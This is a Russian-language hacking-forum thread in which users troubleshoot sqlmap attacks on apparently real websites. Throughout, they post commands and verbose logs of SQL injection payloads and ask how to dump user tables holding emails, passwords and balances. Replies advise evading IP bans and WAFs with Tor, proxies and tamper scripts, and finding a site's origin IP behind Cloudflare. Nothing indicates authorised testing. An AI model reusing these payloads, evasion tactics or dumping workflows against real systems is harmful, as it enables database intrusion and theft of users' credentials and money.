Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Приветствую
    Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

    1.png
     
  2. d_dwacawaca

    d_dwacawaca Member

    Joined:
    4 Jan 2021
    Messages:
    37
    Likes Received:
    7
    Reputations:
    0
    Используй прокси, пусти трафик через ТОР
    Попробуй с того же IP, но почисти куки.
     
    Baskin-Robbins likes this.
  3. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
    Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
    Мой запрос
    Code:
     users -C id,email,password,money  --dump
    Мне допустим надо юзер с ID 123
     
  4. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
     
    #1104 Baskin-Robbins, 10 Feb 2021
    Last edited: 10 Feb 2021
    Duble and seostock like this.
  5. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    [12:51:44] [INFO] fetching database names
    [12:51:44] [INFO] fetching number of databases
    [12:51:44] [PAYLOAD] -3870
    you provided a HTTP Cookie header value, while target URL provides its own cooki
    es within HTTP Set-Cookie header which intersect with yours. Do you want to merg
    e them in further requests? [Y/n] Y
    [12:51:44] [DEBUG] used the default behavior, running in batch mode
    [12:51:45] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
    _name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51-- tCKN
    [12:51:47] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
    _name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48-- tCKN
    [12:51:53] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
    _name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9-- tCKN
    [12:51:54] [INFO] retrieved:
    [12:51:54] [INFO] retrieved:


    Кто сталкивался?
     
  6. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    Параметры с которыми запускаешь SQLMAP? Параметр --batch всегда жмет за тебя Y, --charset=utf-8 присваивает кодировку в UTF-8. Попробуй так:
    Code:
    sqlmap -u http://site[.]ru/ --batch --charset=utf-8 --threads=10 --risk=3 --level=5 --dbs --random-agent --hex
     
  7. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
    Code:
    [19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
    [19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
    [19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
    [19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
    [19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
    [19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
    [19:29:32] [WARNING] false positive or unexploitable injection point detected
    [19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
    [19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
    [19:29:32] [WARNING] HTTP error codes detected during run:
    503 (Service Unavailable) - 681 times
    
    [*] ending @ 19:29:32 /2021-02-19/
    В чем проблема?
    Code:
    --url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only
    До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
    Подскажите как быть?
    [​IMG]
    Не обнаруживает базы данных
    [​IMG]
     
    #1107 Duble, 19 Feb 2021
    Last edited: 19 Feb 2021
  8. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    Теперь ищи реальный ИП сайта.Смотри DNS записи
     
  9. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Есть ссылка вида: http://site.com/index.php?id=image/quickview&host_id=2352
    При запуске этой команды:

    Code:
    sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352"  --proxy-file=C:\proxy.txt  --threads=10 --timeout=180  --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment,space2hash,space2mysqlblank" --level 5 --risk 3 --dbs
    
    Тамперы подставляются к image/quickview
    Возможно ли как-то указать мапе, чтобы проверка шла через host_id=2352?
     
  10. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    @polzunki

    * - указатель точки инъекции
    Code:
    sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah
    
     
    polzunki likes this.
  11. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Благодарю. Вроде получилось, но по итогу получаю это:

    [​IMG]

    URI parameter '#1*' is not injectable

    Откуда берётся #1, если этого нет в таргете?
     
  12. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    это означает, что в указанном параметре под номером 1 нет инъекции, то есть с помощью * можно указывать несколько параметров.
    а если вы хотите увидеть, что отправляется в запросах, то добавьте ключ -v - Уровень вербальности: 1-6 (по умолчанию 1)
    но лучше начните с мануала программы ( он есть и на русском ) или даже с этого!
     
    fandor9 likes this.
  13. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
    Cорян за возможно глупый вопрос, просто не сталкивался со скулей в куках.
    Как правильно кормить мапу?
     
  14. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
    Подскажите в чем проблема?
     
  15. d_dwacawaca

    d_dwacawaca Member

    Joined:
    4 Jan 2021
    Messages:
    37
    Likes Received:
    7
    Reputations:
    0
    Сделай логирование в файл ( -t logfile.txt) и руками проверь запросы, может WAF на database() срабатывает
     
  16. jonni80

    jonni80 New Member

    Joined:
    21 Feb 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую. подскажите что не дает далее базу размотать.

    Database: mysql
    Table: Organization
    [18 columns]
    +------------------+---------+
    | Column | Type |
    +------------------+---------+
    | aa | numeric |
    | auid | numeric |
    | chromosome_id | numeric |
    | e_postaadres | numeric |
    | evadres | numeric |
    | fjalekalimi | numeric |
    | ip | numeric |
    | isbn | numeric |
    | lastpost | numeric |
    | main_module | numeric |
    | mot_de_passe_bdd | numeric |
    | myname | numeric |
    | namaakun | numeric |
    | ordernumber | numeric |
    | parola | numeric |
    | plugin_id | numeric |
    | s_id | numeric |
    | usr_n | numeric |
    +------------------+---------+

    sqlmap -u "https://10.10.10.10/index.php?action=login&controller=User" --host="site.test.com" --data="login=1'&password=g00dPa%24%24w0rD" --dbms=mysql -p login --risk 3 --random-agent -D mysql -T Organization -C mot_de_passe_bdd,parola,usr_n,s_id,e_postaadres,ip,lastpost -v3 --dump

    выкидывает;
    [13:50:52] [PAYLOAD] 1' AND (SELECT 9734 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM mysql.Organization),1,1))>9,0,5)))))yXMR)-- bIfc
    [13:50:52] [INFO] retrieved:
    [13:50:52] [DEBUG] performed 3 queries in 18.58 seconds
    [13:50:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [13:50:52] [WARNING] unable to retrieve the number of column(s) 'e_postaadres,ip,lastpost,mot_de_passe_bdd,parola,s_id,usr_n' entries for table 'Organization' in database 'mysql'
    [13:50:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.10'

    [*] ending @ 13:50:52 /2021-03-22/

    до таблиц дошел, а с колонками проблема . и подставлял --no-cast' or switch '--hex' идр.
    Payload руками перебирать ,пока не сильно понимаю. прошу помощь
     
  17. dddg33

    dddg33 New Member

    Joined:
    28 Mar 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Добрый день! Подскажите плс в чем может быть проблема?

    Code:
    sqlmap.py --random-agent -u "http://site.com/ShoppingPage.asp?CateID=7" -v 3 --batch -D SkhlmcPTBankDB --dump --no-cast --tamper=between,randomcase,space2comment,luanginx --time-sec=10 --threads=10
    Получаю следующие

    Code:
    [03:59:00] [DEBUG] cleaning up configuration parameters
    [03:59:00] [INFO] loading tamper module 'between'
    [03:59:00] [INFO] loading tamper module 'randomcase'
    [03:59:00] [INFO] loading tamper module 'space2comment'
    [03:59:00] [INFO] loading tamper module 'luanginx'
    it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
    [03:59:00] [DEBUG] used the default behavior, running in batch mode
    [03:59:00] [WARNING] using too many tamper scripts is usually not a good idea
    [03:59:00] [DEBUG] setting the HTTP timeout
    [03:59:00] [DEBUG] setting the HTTP User-Agent header
    [03:59:00] [DEBUG] loading random HTTP User-Agent header(s) from file 'E:\sqlmap\data\txt\user-agents.txt'
    [03:59:01] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty)' from file 'E:\sqlmap\data\txt\user-agents.txt'
    [03:59:01] [DEBUG] creating HTTP requests opener object
    [03:59:02] [INFO] resuming back-end DBMS 'microsoft sql server'
    [03:59:02] [DEBUG] resolving hostname 'eshop.antibac-intl.com'
    [03:59:02] [INFO] testing connection to the target URL
    [03:59:03] [DEBUG] declared web page charset 'utf-8'
    you have not declared cookie(s), while server wants to set its own ('ASPSESSIONIDQCTCBDAQ=BEHFEANBBCL...JDFNEOLDOF'). Do you want to use those [Y/n] Y
    [03:59:04] [DEBUG] used the default behavior, running in batch mode
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: CateID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: CateID=7' AND 4290=4290 AND 'EMyv'='EMyv
        Vector: AND [INFERENCE]
    
        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
        Payload: CateID=7' AND 1088 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1088=1088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'AjKx'='AjKx
        Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
    
        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries (comment)
        Payload: CateID=7';WAITFOR DELAY '0:0:10'--
        Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
    
        Type: time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
        Payload: CateID=7' WAITFOR DELAY '0:0:10'--
        Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 9 columns
        Payload: CateID=7' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(69)+CHAR(111)+CHAR(72)+CHAR(84)+CHAR(86)+CHAR(122)+CHAR(108)+CHAR(74)+CHAR(103)+CHAR(102)+CHAR(101)+CHAR(111)+CHAR(119)+CHAR(67)+CHAR(87)+CHAR(99)+CHAR(88)+CHAR(108)+CHAR(97)+CHAR(115)+CHAR(101)+CHAR(65)+CHAR(66)+CHAR(116)+CHAR(85)+CHAR(119)+CHAR(88)+CHAR(115)+CHAR(70)+CHAR(84)+CHAR(112)+CHAR(71)+CHAR(89)+CHAR(85)+CHAR(82)+CHAR(83)+CHAR(98)+CHAR(118)+CHAR(109)+CHAR(109)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL-- jDXf
        Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
    ---
    [03:59:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [03:59:04] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 7 or 2008 R2
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP
    back-end DBMS: Microsoft SQL Server 2005
    [03:59:04] [INFO] fetching tables for database: SkhlmcPTBankDB
    [03:59:06] [DEBUG] resuming configuration option 'string' ('HK')
    [03:59:06] [PAYLOAD] 7'/**/Union/**/AlL/**/SEleCT/**/nULl,nULl,nULl,nULl,nULl,nULl,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+(SEleCT/**/SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects.name/**/As/**/table_name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/innER/**/joiN/**/SkhlmcPTBankDB..sysusers/**/oN/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wHeRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))/**/FOr/**/JSoN/**/AUTO,/**/iNCLUDE_nULl_VALUES)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),nULl,nULl--/**/pqUM
    [03:59:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:07] [PAYLOAD] 7'/**/UniOn/**/aLl/**/sElecT/**/nuLl,nuLl,nuLl,nuLl,nuLl,nuLl,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+COUNt(SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects.name/**/aS/**/table_name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),nuLl,nuLl/**/frOM/**/SkhlmcPTBankDB..sysobjects/**/inNEr/**/Join/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wHERE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))--/**/OJqX
    [03:59:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:08] [WARNING] the SQL query provided does not return any output
    [03:59:08] [PAYLOAD] 7
    [03:59:10] [PAYLOAD] 7'/**/aNd/**/3241/**/iN/**/(seLECt/**/(CHaR(113)+CHaR(107)+CHaR(98)+CHaR(120)+CHaR(113)+(seLECt/**/COUnt(SkhlmcPTBankDB..sysusers.name+CHaR(46)+SkhlmcPTBankDB..sysobjects.name/**/aS/**/table_name)/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/iNNER/**/JOiN/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(CHaR(117),CHaR(118)))+CHaR(113)+CHaR(112)+CHaR(112)+CHaR(107)+CHaR(113)))/**/aNd/**/'qpCU'='qpCU
    [03:59:11] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:11] [WARNING] the SQL query provided does not return any output
    [03:59:12] [PAYLOAD] 7'/**/uNiOn/**/All/**/selEct/**/NUll,NUll,NUll,NUll,NUll,NUll,cHAR(113)+cHAR(107)+cHAR(98)+cHAR(120)+cHAR(113)+(selEct/**/table_schema+cHAR(46)+table_name/**/fROM/**/information_schema.tables/**/WHeRE/**/table_catalog=cHAR(83)+cHAR(107)+cHAR(104)+cHAR(108)+cHAR(109)+cHAR(99)+cHAR(80)+cHAR(84)+cHAR(66)+cHAR(97)+cHAR(110)+cHAR(107)+cHAR(68)+cHAR(66)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_NUll_VALUES)+cHAR(113)+cHAR(112)+cHAR(112)+cHAR(107)+cHAR(113),NUll,NUll--/**/XTJu
    [03:59:12] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:13] [WARNING] reflective value(s) found and filtering out
    [03:59:13] [PAYLOAD] 7'/**/unIOn/**/All/**/SElEcT/**/Null,Null,Null,Null,Null,Null,CHar(113)+CHar(107)+CHar(98)+CHar(120)+CHar(113)+(SElEcT/**/name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=CHar(85)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_Null_VALUES)+CHar(113)+CHar(112)+CHar(112)+CHar(107)+CHar(113),Null,Null--/**/oEuh
    [03:59:14] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:14] [PAYLOAD] 7'/**/uNiOn/**/ALl/**/SElecT/**/Null,Null,Null,Null,Null,Null,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+COUnT(name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),Null,Null/**/FrOm/**/SkhlmcPTBankDB..sysobjects/**/Where/**/xtype=ChaR(85)--/**/jzSk
    [03:59:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:15] [WARNING] the SQL query provided does not return any output
    [03:59:15] [PAYLOAD] 7'/**/ANd/**/6591/**/In/**/(seLEct/**/(chAR(113)+chAR(107)+chAR(98)+chAR(120)+chAR(113)+(seLEct/**/CoUNT(name)/**/FROm/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=chAR(85))+chAR(113)+chAR(112)+chAR(112)+chAR(107)+chAR(113)))/**/ANd/**/'SuZW'='SuZW
    [03:59:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:16] [WARNING] the SQL query provided does not return any output
    [03:59:16] [INFO] fetching number of tables for database 'SkhlmcPTBankDB'
    [03:59:16] [PAYLOAD] 7'/**/AnD/**/UniCODE(sUBstRInG((SeLeCt/**/ltriM(StR(cOUnT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(CHar(117),CHar(118))),1,1))/**/NOt/**/BETWEen/**/0/**/AnD/**/51/**/AnD/**/'dxUf'='dxUf
    [03:59:17] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:17] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
    [03:59:17] [PAYLOAD] 7'/**/ANd/**/UnIcODe(sUbstRIng((SELeCT/**/LtRim(stR(cOunT(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wHeRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(ChAR(117),ChAR(118))),1,1))/**/Not/**/bEtwEeN/**/0/**/ANd/**/48/**/ANd/**/'dxUf'='dxUf
    [03:59:18] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:18] [PAYLOAD] 7'/**/AnD/**/UnIcODE(SUBstRIng((sELect/**/LtRim(sTr(coUNt(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(chAr(117),chAr(118))),1,1))/**/NOt/**/bETweEN/**/0/**/AnD/**/9/**/AnD/**/'dxUf'='dxUf
    [03:59:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:19] [INFO] retrieved:
    [03:59:19] [DEBUG] performed 3 queries in 2.67 seconds
    multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
    [03:59:19] [DEBUG] used the default behavior, running in batch mode
    [03:59:19] [PAYLOAD] 7'/**/iF(UNICOde(sUbstrInG((SELEcT/**/lTRiM(StR(Count(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/whERe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(cHAR(117),cHAR(118))),1,1))/**/noT/**/beTWeen/**/0/**/aND/**/51)/**/WAITFOR/**/DELAY/**/'0:0:10'--
    [03:59:19] [WARNING] time-based comparison requires larger statistical model, please wait.................. (done)
    [03:59:35] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:35] [PAYLOAD] 7'/**/If(uNIcODE(SUbSTriNg((sELEct/**/LtrIM(stR(COunT(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/wHere/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChAr(117),ChAr(118))),1,1))/**/noT/**/betWEEN/**/0/**/AnD/**/48)/**/WAITFOR/**/DELAY/**/'0:0:10'--
    [03:59:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [03:59:36] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:36] [PAYLOAD] 7'/**/iF(UnicOdE(SubString((SElECt/**/lTRim(sTr(cOuNT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(Char(117),Char(118))),1,1))/**/Not/**/BEtwEEn/**/0/**/AnD/**/9)/**/WAITFOR/**/DELAY/**/'0:0:10'--
    [03:59:37] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
    [03:59:37] [INFO] retrieved:
    [03:59:37] [DEBUG] performed 3 queries in 17.57 seconds
    [03:59:37] [INFO] resumed: 0
    [03:59:37] [DEBUG] performed 0 queries in 0.00 seconds
    [03:59:37] [CRITICAL] unable to retrieve the tables for any database
    [03:59:37] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 13 times
     
  18. dddg33

    dddg33 New Member

    Joined:
    28 Mar 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    После
    Code:
    --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
    Выдал

    Code:
    [01:16:41] [CRITICAL] unable to retrieve the tables for any database
    [01:16:41] [WARNING] HTTP error codes detected during run:
    414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
    [01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    Как можно обойти waf ?
    Заранее спасибо!
     
  19. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0

    а есть где то полный мануал от тебя ?
     
  20. Juiseppe

    Juiseppe New Member

    Joined:
    16 Feb 2020
    Messages:
    117
    Likes Received:
    4
    Reputations:
    0
    Кто нибудь мапом обходил Imunify360 (CloudLinux) waf ?